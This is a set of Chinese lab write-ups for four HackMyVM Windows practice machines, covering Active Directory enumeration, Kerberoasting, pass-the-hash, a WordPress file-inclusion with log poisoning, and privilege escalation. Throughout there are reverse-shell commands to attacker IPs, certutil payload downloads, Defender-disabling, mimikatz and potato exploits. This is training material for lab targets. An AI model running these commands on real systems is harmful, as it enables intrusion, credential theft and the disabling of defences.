HackMyVm-DC01 ：简单 10.1 信息打点nmap -sS 192.168.53.26 -p- -T4 | grep -E '^[0-9]+/tcp' | awk -F '/' '{print $1}' | tr '\n' ',' | sed 's/,$//'漏洞扫描nmap -sS 192.168.53.26 -p 53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,49664,49667,49676,49707,49783 -T4 --script=vuln使用新版enum4Linux枚举系统的全部信息enum4Linux-ng -A 192.168.53.26 -C10.2 SMB无密登录列出来smb共享文件夹可以匿名登录的共享目录中都没有文件，只能继续信息收集从上面enum4Linux-ng枚举结果显示除了SMB服务，还有LDAP以及LDAPS（加密传输，类似于https）服务可达，运行在389/636端口LDAP 是域内 “用户 / 组 / 计算机信息的数据库”，后续有账号就能查域内核心信息（如用户列表、管理员组）。Appears to be root/parent DC：目标可能是”主域控制器“，也就是域控，完整的域名为：SOUPEDECODE.LOCAL域控制器（DC）是域的 “核心”，存储所有域信息（账号、权限、计算机），拿下它就等于控制整个域后续 LDAP 查询（如 ldapsearch）要写 -b "dc=SOUPEDECODE,dc=LOCAL"，Kerberos 攻击要指定 -d SOUPEDECODE.LOCAL，没有这个域名，大部分域操作都无法执行。域的 “短域名” 是 SOUPEDECODE（完整域名是 SOUPEDECODE.LOCAL，短域名是简化版）后续登录域账号时可用短域名（如 SOUPEDECODE\admin）或完整域名（如 admin@SOUPEDECODE.LOCAL），两种格式都支持，短域名更简洁。其中- SOUPEDECODE <1c> - B DomAIn Controllers代表着 DC01 属于 “域控制器组”，进一步验证它是域控制器，不是普通域内主机。刚刚提到了，使用LDAP查询（如ldapsearch）需要增加一个参数 -b，Kerberos 攻击要指定 -d SOUPEDECODE.LOCAL10.3 ldapsearch那么利用ldapsearch的完整命令就如下ldapsearch -x -H ldap://192.168.53.26 -D '' -w '' -b "dc=SOUPEDECODE,dc=LOCAL" -s base "(objectclass=user)"上面的代码是什么意思呢？其核心”匿名访问被拒绝“各个参数解释如下连接 192.168.53.26 这台 LDAP 服务器（域控制器）；用 匿名方式 访问（-D '' -w '' 表示空用户名、空密码）；查询 dc=SOUPEDECODE,dc=LOCAL 这个节点（域的核心数据节点，存储用户、组等信息）；只查该节点本身（-s base），且只找 “用户类型” 的对象（(objectclass=user)）。为什么报错了？text: 000004DC: LdapErr: DSID-0C090A58, comment: In order to perform this operation a successful bind must be completed on the connection., data 0, v4f7c翻译过来是：“要执行这个操作，必须先在连接上完成‘成功的绑定’（即提供有效的账号密码进行身份验证）”我们想访问的 dc=SOUPEDECODE,dc=LOCAL 节点是域的 “敏感数据区”（存着用户账号、权限等核心信息），域控制器为了安全，禁止匿名用户访问这个区域，必须用 “合法的域账号” 登录后才能查询。如果不加这个-b参数呢，把它去掉，这样就成功了ldapsearch -x -H ldap://192.168.53.26 -D '' -w '' -b '' -s base "(objectclass=user)"这段 ldapsearch 结果包含了 域控制器（192.168.53.26）的核心架构信息我们之前执行的命令指定 -b "dc=SOUPEDECODE,dc=LOCAL"，默认查的是 LDAP 的 “根节点”（-b ""）：根节点只存域的基础架构信息（如域名、支持的协议），不包含敏感数据，所以允许匿名访问，命令能成功；而之前指定的 dc=SOUPEDECODE,dc=LOCAL 是 “核心数据节点”，匿名访问被拒绝，所以报错。这次查询返回的是 LDAP 根节点的配置信息，本质是域控制器 “公开可见的基础架构数据”，包含 5 类关键内容：域的命名结构（域名、目录节点路径）；域功能级别（操作系统版本版本）；支持的协议和认证机制；域控制器的身份标识标识（主机名、角色）；LDAP 服务的配置限制（如最大连接数、查询超时）。10.4 匿名枚举用户的SID解释那么多，渗透到目前收集到的信息，本质就是没有账号密码，获取账号密码可以利用lookupsidfind / -name lookupsid* 2>/dev/nulllookupsid.py 是 Impacket 工具集中的 SID 枚举工具，核心作用是通过 SMB/LDAP 协议查询目标系统的 安全标识符（SID）及其对应账号 / 组信息，在域渗透中常用于 “匿名 / 低权限枚举域内关键账号（如管理员）”，下面枚举soupedecode.local这个域的SID信息，并使用匿名账号和空密码（-no-pass）登录（部分域会禁用匿名登录，这里是一个突破点）python /usr/share/doc/python3-impacket/examples/lookupsid.py soupedecode.local/anonymous@192.168.53.26 -no-pass为什么能列举出来SID？lookupsid.py，通过匿名访问这个域（工具连接域控制器后，会先查询 “域本身的 SID”），通过枚举rid（sid最后一部分），再拼接完整的sid，工具把每个 “完整 SID” 发给域控制器，调用它的 LsaLookupSids2 接口（就像查字典），问：“这个 SID 对应哪个账号？”，这样工具就会返回给你对应的账号信息# 筛选 SidTypeUser 行 → 提取账号名（去掉 SOUPEDECODE\） → 去重 → 保存到 target_users.txt，AI一下就行 grep "SidTypeUser" /data/demo/user | awk -F '\\\\' '{print $2}' | awk '{print $1}' | sort -u > /data/demo/target_users.txt10.5 nxc内网渗透nxc内网渗透神器，进行SMB爆破，但是这里我们是用户和密码都不知道，相当于burpsuite中的集群炸弹攻击，为了减少攻击次数，我们可以使用相同的账号密码，进行攻击，也就是burpsuite中的Pitchfork攻击所以命令如下nxc smb 192.168.53.26 -u target_users.txt -p target_users.txt --no-bruteforce --continue-on-success找到ybob317:ybob317账号密码，继续接下来的渗透，smb登录，照样也没有任何东西换一个USERS，这里面有东西，我们去看看，全部下载下来尝试上传一个文件shell，禁止上传将全部的文件都下载下来recurse ON prompt OFF mget *在ybob317中找到了flag10.6 kerberos攻击服务器上开启了kerberos服务如果目标是 域控制器（DC）（如你之前枚举的 DC01.SOUPEDECODE.LOCAL），则 一定开启了 Kerberos 服务，因为：1、Kerberos 是 Windows 域环境的核心认证协议，用于域内账号登录、服务访问等身份验证；2、域控制器作为 Kerberos 的 “密钥分发中心（KDC）”，必须运行 Kerberos 服务（kdc.exe 进程），否则域功能无法正常工作。impacket-GetUserSPNs -request -dc-ip 192.168.53.26 SOUPEDECODE.LOCAL/ybob317:ybob317通过域用户 ybob317 的凭证，向域控制器（IP：192.168.53.26）查询域内所有关联了 SPN 的用户，并强制请求并获取这些用户的 TGS 票据（Ticket-Granting Service），最终可用于破解用户密码（利用 hashcat 等工具爆破 TGS 票据哈希）。同步时间ntpdate 192.168.53.26将这些内容全部复制到一个名叫”hash“文件中，使用hashcat攻击，爆破出来file_svc用户的密码为Password123!!hashcat -a 0 -m 13100 hash /usr/share/wordlists/rockyou.txt使用smbclient登录smbclient //192.168.53.26/backup -U file_svc Password123!! get backup_extract.txt exit随后使用awk进行筛选awk -F '[:]' '{print $4}' backup_extract.txt > ntml.txtnxc smb 192.168.53.26 -u target_users.txt -H ntml.txt最终账号密码如下FileServer$ ：e41da7e79a4c76dbd9cf79d1cb32555910.7 远程连接evil-winrm -i 192.168.53.26 -u "FileServer$" -H "e41da7e79a4c76dbd9cf79d1cb325559"至此已经拿到了管理员权限，和最后的flag，据说在域中administrator就是系统权限10.8 获取system权限后续如果有兴趣的是否可以利用这个管理员权限提升至系统权限，默认的cmd下载命令不能用，只能用powershell，命令如下Invoke-WebRequest -Uri "http://192.168.53.141:8000/PrivescCheck.ps1" -OutFile "PrivescCheck.ps1" Set-ExecutionPolicy Bypass -Scope process -Force ./PrivescCheck.ps1 # 或者. .\PrivescCheck.ps1 Invoke-PrivescCheck Set-MpPreference -DisableRealtimeMonitoring $true # 关闭杀软 Invoke-WebRequest -Uri "http://192.168.53.141:8000/shell.exe" -OutFile "shell.exe" ./shell.exe # MSF生成的马可以看到是能正常上线的扫描出来两个提权漏洞，第二个不能用可以使用第一个，但是没有创建成功会话，由于桥接模式老是自动换ip，就不继续了，另外使用mimikatz.exe也不能正常执行，x86和x64都试过了，后续有做出来的师傅，欢迎添加我好友，一起讨论 + bAIbAIxiaoyu2024exploit/windows/local/ms16_032_secondary_logon_handle_privesc往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 Linux 信息收集，提权一键梭哈神器x-WAF，一个基于fuzz的WAF绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【OSCP】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略SQL注入中各种WAF的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的WAF防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种WAF绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

Hackmyvm-TriplAdvisor ：简单 9.1 信息打点nmap -sS 192.168.53.243 -p- -T4发现有一个http的域名解析，需要我们在hosts文件中添加好相关的信息nmap -sS 192.168.53.243 -p 445,5985,8080 -T4 -A打开windows的hosts文件，添加如下信息C:\Windows\System32\drivers\etc\hostskali攻击机器中也不能忘了（方便渗透测试，windows中添加只是为了访问，当然也可以配置代理到kali）echo "192.168.53.243 tripladvisor" >> /etc/hosts打开信息收集插件，发现这是一个wordpress内容管理系统wpscan进行可能的用户，后台密码爆破wpscan --url http://tripladvisor:8080/wordpress/ -e u -P /usr/share/wordlists/fasttrack.txtwordpress版本信息已经被扫描出来了再使用详细扫描，发现一个插件wpscan --url http://tripladvisor:8080/wordpress/9.2 漏洞利用漏洞检索searchsploit editor 1.1 wordpress searchsploit -m 44340漏洞信息┌──(root㉿kali)-[/data/demo] └─# cat 44340.txt Product: Site Editor Wordpress Plugin - https://wordpress.org/plugins/site-editor/ Vendor: Site Editor Tested version: 1.1.1 CVE ID: CVE-2018-7422 ** CVE description ** A Local File Inclusion vulnerability in the Site Editor plugin through 1.1.1 for WordPress allows remote attackers to retrieve arbitrary files via the ajax_path parameter to editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php. ** Technical details ** In site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php:5, the value of the ajax_path parameter is used for including a file with PHP’s require_once(). This parameter can be controlled by an attacker and is not properly sanitized. Vulnerable code: if( isset( $_REQUEST['ajax_path'] ) && is_file( $_REQUEST['ajax_path'] ) && file_exists( $_REQUEST['ajax_path'] ) ){ require_once $_REQUEST['ajax_path']; } https://plugins.trac.wordpress.org/browser/site-editor/trunk/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?rev=1640500#L5 By providing a specially crafted path to the vulnerable parameter, a remote attacker can retrieve the contents of sensitive files on the local system. ** Proof of Concept ** http:///wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd ** Solution ** No fix available yet. ** Timeline ** 03/01/2018: author contacted through siteeditor.org's contact form; no reply 16/01/2018: issue report filled on the public GitHub page with no technical details 18/01/2018: author replies and said he replied to our e-mail 8 days ago (could not find the aforementioned e-mail at all); author sends us "another" e-mail 19/01/2018: report sent; author says he will fix this issue "very soon" 31/01/2018: vendor contacted to ask about an approximate release date and if he needs us to postpone the disclosure; no reply 14/02/2018: WP Plugins team contacted; no reply 06/03/2018: vendor contacted; no reply 07/03/2018: vendor contacted; no reply 15/03/2018: public disclosure ** Credits ** Vulnerability discovered by Nicolas Buzy-Debat working at Orange Cyberdefense Singapore (CERT-LEXSI). -- Best Regards, Nicolas Buzy-Debat Orange Cyberdefense Singapore (CERT-LEXSI)存在文件包含漏洞，根据上面的url进行修改http://tripladvisor:8080/wordpress/wp-content/plugins/editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd因为这是windows系统，不存在/etc/passwd，那么怎么快速判断文件是否存在？字典https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/file_inclusion_windows.txt打开bp这里我们上传不了文件（没有账号密码），所以只能包含日志文件c:/xampp/apache/logs/access.log9.3 反弹shell使用curl写入日志，并包含日志文件，尝试获取命令执行结果，结果能正常执行命令┌──(root㉿kali)-[/usr/share/wordlists] └─# curl -A "" http://tripladvisor:8080/wordpress/ ┌──(root㉿kali)-[/usr/share/wordlists] └─# curl "http://tripladvisor:8080/wordpress/wp-content/plugins/editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=c:/xampp/apache/logs/access.log"根据前面传MSF马上去的经验，这里就传个nc吧curl -A "" http://tripladvisor:8080/wordpress/ curl -A "" http://tripladvisor:8080/wordpress/ curl "http://tripladvisor:8080/wordpress/wp-content/plugins/editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=\xampp\apache\logs\access.log"切换到当前用户的文件夹，可以看到第一个flag将这个shell利用nc传到MSF中，进行本地漏扫（试一试，说不定就出来了呢，虽然它只在meterpreter后渗透模块中生效）nc.exe 192.168.53.51 1234 -e cmd9.4 MSF内核漏扫MSFconsole use exploit/multi/handler # 加载handler模块 # 根据目标系统选择payload（nc反弹的是基础shell，非meterpreter） # 目标是Windows，接收nc命令反弹的shell： set PAYLOAD windows/shell_reverse_tcp set LHOST 192.168.53.51 # 攻击机IP（与nc反弹目标一致） set LPORT 1234 # 监听端口（与nc反弹端口一致） run -j # 启动监听，保持后台执行 use multi/recon/local_exploit_suggester # 使用本地提权漏扫模块，估计这里没效果，目前测试只有meterpreter模块反弹的shell能用 set session 1 # 设置反弹成功的会话id为1，使用 sessions 即可查看所有的会话id9.5 土豆提权certutil.exe -urlcache -split -f http://192.168.53.51:8000/GodPotato-NET2.exe certutil.exe -urlcache -split -f http://192.168.53.51:8000/GodPotato-NET35.exe certutil.exe -urlcache -split -f http://192.168.53.51:8000/GodPotato-NET4.exe失败.\GodPotato-NET4.exe -cmd "cmd /c whoami" .\GodPotato-NET35.exe -cmd "cmd /c whoami" .\GodPotato-NET2.exe -cmd "cmd /c whoami"9.6 JuicyPotato提权certutil.exe -urlcache -split -f http://192.168.53.51:8000/JuicyPotato.exe certutil.exe -urlcache -split -f http://192.168.53.51:8000/CLSID/Windows_Server_2008_R2_Enterprise/CLSID.listhttps://github.com/ohpe/juicy-potato/blob/master/CLSID/Windows_Server_2008_R2_Enterprise/CLSID.list然后用这个工具测试certutil.exe -urlcache -split -f http://192.168.53.51:8000/juicy-potato/Test/test_clsid.bat此时你的靶机上应该要有这三个文件此时验证一下，能否正常访问administrotar的文件，结果为拒绝访问（因为靶机限制了我不能使用whoami，所以只能这样验证）回到目录，执行此文件随便选择一个系统权限的clsid最终提权命令如下，kali记得开ncJuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c C:\xampp\htdocs\wordpress\wp-content\plugins\editor\editor\extensions\pagebuilder\includes\nc.exe 192.168.53.51 4444 -e cmd.exe" -t *此时就可以访问管理员的文件了往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 Linux 信息收集，提权一键梭哈神器x-WAF，一个基于fuzz的WAF绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【OSCP】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略SQL注入中各种WAF的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的WAF防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种WAF绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

HackMyVm-Runas ：简单 8.1 信息打点首先进行全端口扫描端口详细信息探测时使用guest账户即可获取信息，说明 SMB 可能允许匿名访问或 guest 权限过高。可以使用smbclient进行匿名登录试试，登录成功！但是没有任何东西ms17-010使用目录扫描、nothing8.2 文件包含利用来到首页点进来index.php发现需要我们传一个file参数，大概率就是文件包含了尝试包含index.php没有效果利用burp进行批量文件包含，字典网上随便找几个筛选内容可以看到这里有一段密文runas-b3a805b2594befb6c846d718d1224557yakuzza解密网站https://www.somd5.com/8.3 远程连接有了账号密码，登录口在哪？看了看之前的端口扫描结果是没有3389端口的，但是现在又有了。。。。。（中途换了换网，ip变成了10.10.10.168）可能是我疏忽了吧，快点来连，搞不好等一下又关了8.4 创建反向shellwindows下载马certutil.exe -urlcache -split -f http://10.10.10.137:8000/shell.exeMSF注意监听，同时执行windows机器上的马MSFconsole use multi/handler set lhost 10.10.10.137 set payload windows/meterpreter/reverse_tcp run8.5 MSF内核提权全部失败。。。8.6 WinPEAS提权在windows中下载下来，并执行，发现一个最新的漏洞补丁没有打certutil.exe -urlcache -split -f http://10.10.10.137:8000/winPEAS.bat ./winPEAS.bat使用searchsploit检索exp在windwos中的VS打开，打包成exe放上去执行的时候没有任何回显，失败了8.7 土豆提权后面又试过好几种方法，土豆提权，提权失败certutil.exe -urlcache -split -f http://10.10.10.137:8000/GodPotato-NET2.exe certutil.exe -urlcache -split -f http://10.10.10.137:8000/GodPotato-NET35.exe certutil.exe -urlcache -split -f http://10.10.10.137:8000/GodPotato-NET4.exe GodPotato-NET2.exe -cmd "cmd /c whoami" GodPotato-NET35.exe -cmd "cmd /c whoami" GodPotato-NET4.exe -cmd "cmd /c whoami"8.8 JuicyPotato提权烂土豆提权certutil.exe -urlcache -split -f http://10.10.10.137:8000/JuicyPotato.exe certutil.exe -urlcache -split -f http://10.10.10.137:8000/CLSID/Windows_7_Enterprise/CLSID.list certutil.exe -urlcache -split -f http://10.10.10.137:8000/juicy-potato/Test/test_clsid.batJuicyPotato.exe -l 1337 -c "{4991d34b-80a1-4291-83b6-3328366b9097}" -p c:\windows\system32\cmd.exe -a "/c C:\Users\runas\nc.exe 10.10.10.137 4444 -e c:\windows\system32\cmd.exe" -t *执行成功了，但是不能执行命令，提权失败8.9 runas提权在网上找到了这个，使用runas提权https://www.cnblogs.com/kqdssheng/p/18751119在上面这个图片中，可以看到本地管理员账户的凭据已存储在凭据管理器中，并且当前用户是runas！当前的 runas 用户能列出 RUNAS-PC\Administrator 的缓存凭据，具备利用这些凭据实现本地提权的条件Domain:interactive=RUNAS-PC\Administrator 是 “交互式登录的管理员凭据缓存”，意味着系统之前保存过 Administrator 的登录信息（比如用户曾用 Administrator 登录，或通过 runas /savecred 保存过凭据）。虽然无法直接看到明文密码，但 Windows 允许 “在缓存凭据存在时，以该用户身份执行程序”—— 这是提权的关键：8.10 两种具体提权方法使用下面的命令启动一个cmdrunas /savecred /user:RUNAS-PC\Administrator "cmd.exe"此时你执行完这条命令目标机器就会弹出一个cmd窗口，此时你执行命令的时候就是administrator超级管理员，那么我们是不是能够通过上面这条命令执行一个木马，或者nc，来反弹这个shell到kali上？来试试，提权成功！certutil.exe -urlcache -split -f http://10.10.10.137:8000/nc.exe # 从kali中下载nc runas /savecred /user:Administrator "C:\Users\runas\nc.exe 10.10.10.169 4444 -e cmd.exe"8.11 MSF内核扫描提升至系统权限可以使用winPACE.exe进行信息收集，在尝试过各种admin提权到系统权限的方式比如multi/recon/local_exploit_suggester MS17-017 exploit/windows/local/ms16_075_reflection 烂土豆提权 土豆提权 多土豆汁提权等等MS16-032最终测试出来windows/local/service_permissions 能够成功提权到system权限， Windows服务权限配置错误漏洞。8.13 抓取明文密码上传mimikatz，获取明文密码！！certutil.exe -urlcache -split -f http://10.10.10.169:8000/mimikatz.exe往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 Linux 信息收集，提权一键梭哈神器x-WAF，一个基于fuzz的WAF绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【OSCP】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略SQL注入中各种WAF的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的WAF防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种WAF绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

HackMyVm-Always ：简单 7.1 信息打点nmap -sS -p- -T4 10.10.10.161 -A使用目录扫描出来一个admin后台界面查看源码发现账号密码信息登录进来发现一个base编码解密ftpuser:KeepGoingBro!!!7.2 登录FTP使用刚刚的账号密码登录ftp 10.10.10.161发现了一个robots.txt，使用下面的命令将它下载下来get robots.txt查看这个robots.txt中的文件管理员的秘密笔记 1）禁用防火墙和 Windows Defender。 2）启用 FTP 和 SSH。 3）启动 Apache 服务器。 4）别忘了更改用户“always”的密码。当前密码是“WW91Q2FudEZpbmRNZS4hLiE=”。又得到一个密码always:YouCantFindMe.!.!7.3 远程登录发现密码不对，我们来使用hydra来爆破rdp协议使用enum4Linux枚举，看到支持的smb协议，为1.0和2.0/2.1，3.0以上均不支持，让我联想到了永痕之蓝漏洞（MS17-010）enum4Linux-ng -A 10.10.10.161 -C含义：-A 是 --all 的缩写，表示执行全量信息收集，包含以下枚举内容：主机基础信息（主机名、工作组 / 域、MAC 地址）；SMB 协议支持情况（支持的 SMB 版本、签名配置）；用户和组列表（本地用户、域用户、内置组等）；共享目录（可访问的 SMB 共享及权限）；操作系统版本（通过 RPC 或 SMB 信息推断）；服务、打印机、系统策略等其他信息。7.4 永痕之蓝利用，很遗憾利用失败利用nxc枚举这两个账号密码always:YouCantFindMe.!.! ftpuser:KeepGoingBro!!!看到ftpuser用户，尝试登录，也不让远程登录7.5 近源攻击这里没找到其他方法，直接登录靶机上传shell吧（近源攻击），这里还需要注意，就是需要修改一下语言为美国的，不然登录不进去7.6 MSF获取反向shellMSFvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.137 LPORT=4444 -f exe -o shell.exe certutil -urlcache -split -f http://10.10.10.137:8000/shell.exe c:\1.exeMSF上线MSFconsole use exploit/multi/handler set payload windows/meterpreter/reverse_tcp set lhost 10.10.10.137 set lport 4444 run7.6 MSF内核漏扫use multi/recon/local_exploit_suggester使用第一个模块，设置第一个会话，并进行提权##往期推荐全网首发！HMV全套windows机器提权，域渗透教程，2w字超详细HackMyVm-DC04 ：简单HackMyVm-DC03 ：简单HackMyVm-DC02 ：简单HackMyVm-DC01 ：简单HackMyVm-TriplAdvisor ：简单HackMyVm-Runas ：简单HackMyVm-Always ：简单HackMyVm-Nessus ：简单HackMyVm-Liar ：简单HackMyVm-Simple ：简单HackMyVm-Simple ：简单HackMyVm-Zero ：简单HackMyVm-OMG ：简单新版BurpSuite v2025.6.3汉化版，附激活教程Fine！2025最新款信息收集综合工具若依Vue漏洞检测工具v7更新最好用的下一代目录爆破工具，全方位的目录爆破集成MemProcFS，Vol2和Vol3的内存取证神器重大更新！FeatherScan v4.5 内网 Linux 信息收集，提权一键梭哈神器x-WAF，一个基于fuzz的WAF绕过渗透工具这10款内网穿透工具，一定有你没用过的红队命令速查手册挖SRC必须知道的25个漏洞提交平台挖SRC必须知道的25个漏洞提交平台FeatherScan v4.0 - 一款Linux内网全自动信息收集工具掩日-适用于红队的综合免杀工具2025最新渗透测试靶场推荐近400个渗透测试常用命令，信息收集、web、内网、隐藏通信、域渗透等等【内网渗透】隐藏通信隧道技术内网渗透必备，microsocks，一个轻量级的socks代理工具神器分享 红队快速打点工具-DarKnuclei红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路【渗透测试】DC1~9(全) Linux提权靶机渗透教程，干货w字解析，建议收藏【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！一个永久的渗透知识库【OSCP】vulnerable_docker，三种代理方法打入内网【内网渗透】CobaltStrike与MSF联动互相上线的方式内网渗透必备，microsocks，一个轻量级的socks代理工具【OSCP】 Kioptrix 提权靶机（1-5）全系列教程，Try Harder！绝对干货！DC-2综合渗透，rbash逃逸，git提权，wordpress靶场渗透教程【渗透测试】12种rbash逃逸方式总结红日靶场5，windows内网渗透，社工提权，多种域内横向移动思路红日靶场3，joomla渗透，海德拉SMB爆破，域内5台主机横向移动教学不用MSF？红日靶场4，从外网到域控，手工干永恒之蓝，教科书级渗透教学ATK&CK红日靶场二，Weblogic漏洞利用，域渗透攻略SQL注入中各种WAF的绕过方式，狗，盾，神，锁，宝利用MySQL特性，WAF绕过技巧SQL注入绕过某狗的WAF防火墙，这一篇就够了，6k文案超详细大型翻车现场，十种WAF绕过姿势，仅成功一种喜欢长文吗？1w字图文带你了解sqlmap，从0到1，WAF绕过，高级用法一文通透

